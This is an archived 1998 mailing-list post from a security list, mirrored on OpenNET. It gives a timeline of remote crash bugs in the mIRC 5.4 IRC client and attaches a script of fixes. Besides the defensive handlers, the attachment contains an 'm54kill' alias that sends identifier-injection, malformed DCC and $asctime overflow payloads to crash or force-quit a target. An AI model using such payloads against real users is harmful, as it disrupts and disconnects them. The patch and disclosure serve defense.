The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Another NEW mIRC bug and ALL mIRC Exploit patches


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Fri, 24 Jul 1998 08:17:51 -0400
From: Derek Reynolds <[email protected]>
To: [email protected]
Subject: Another NEW mIRC bug and ALL mIRC Exploit patches

--=====================_901297071==_
Content-Type: text/plain; charset="us-ascii"

History of Events: (Remote Exploits)

 07/18/98 - Someone on DALnet finds problem with DCC SEND and DCC RESUME
(exploit made)

 07/20/98 - $asctime bug revealed

 07/21/98 - myn discovers a large problem with $calc and notices that most
scripts that
            use on ctcpreply ping perform a  $calc. He then implements the
$asctime bug
            into on ctcpreply ping which ables a user to remotely crash the
mIRC client

 07/22/98 - v9 evaluates myn's bug finding and plays with on ctcpreply some
more and                finds that $calc evaluates custom alias's or functions.

 07/23/98 - Some uninformed person believes that it is on IRCN native and
posts a             message to rootshell.com and forgets the big picture.
Any mIRC script that             makes use of the event "ON CTCPREPLY PING"
which does a $calc or any other             remote/event that uses $calc is
exploitable.


Most people are only patching themselves against the $calc bug, but are
still wondering why their mIRC keeps crashing.. Its because they have not
patched themselves against the 2 other remote mIRC exploits.

Below is the patch for ALL known remote mIRC exploits.
to install it type "/load -rs m54-fix-sploits.mrc"

Peace.

myn@efnet



--=====================_901297071==_
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: attachment; filename="m54fix-sploits.mrc"

;mIRC 5.4 QuickFIX and Exploits
;myn@efnet - 07/22/98


;Here is the Quick Fix for all know mIRC 5.4 Exploits to date (07/22/98)

;DCC exploit fix
ctcp *:DCC SEND: { if $4 == 9582342556 { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } }
ctcp *:DCC RESUME: { if $4 == $null { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } }

;ctcpreply ping $asctime crash and $identifier Exploit fix
;replace all instances of the event "on ctcpreply" with the one below

on 1:CTCPREPLY:PING* {
  if (2147483647 isin $2) { echo -a * Incoming ctcpreply asctime exploit from $nick | halt }
  if ($ isin $2-) { echo -a * Incoming ctcpreply identifier exploit --> $2- from $nick   | halt }
  echo -a * [ $+ $nick PING reply]: $calc($ctime - $2-) sec(s)
  halt
}

;And as an added bonus for all you DALnet kiddies
;This sends all known mIRC 5.4 exploits at once
alias m54kill {
  if ($1) {
    .ctcpreply $1 ping $!quit(I'm, a, DALnet, KiDDie)
    %ip = $rand(600000000,4294967294)
    .quote privmsg $1 : $+ $chr(1) $+ DCC SEND $r(1,99) $+ .txt %ip $r(113,9000) $+ $chr(1) $+ $lf $+ privmsg $1 : $+ $chr(1) $+ DCC RESUME $r(1,99) $+ .txt $+ $chr(1)
    .ctcpreply $1 ping $!asctime(2147483647)
    echo -a * Sent mIRC kills to $1
    halt
  }
  echo -a * Parms [/m54kill nick/#channel]
}
--=====================_901297071==_--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру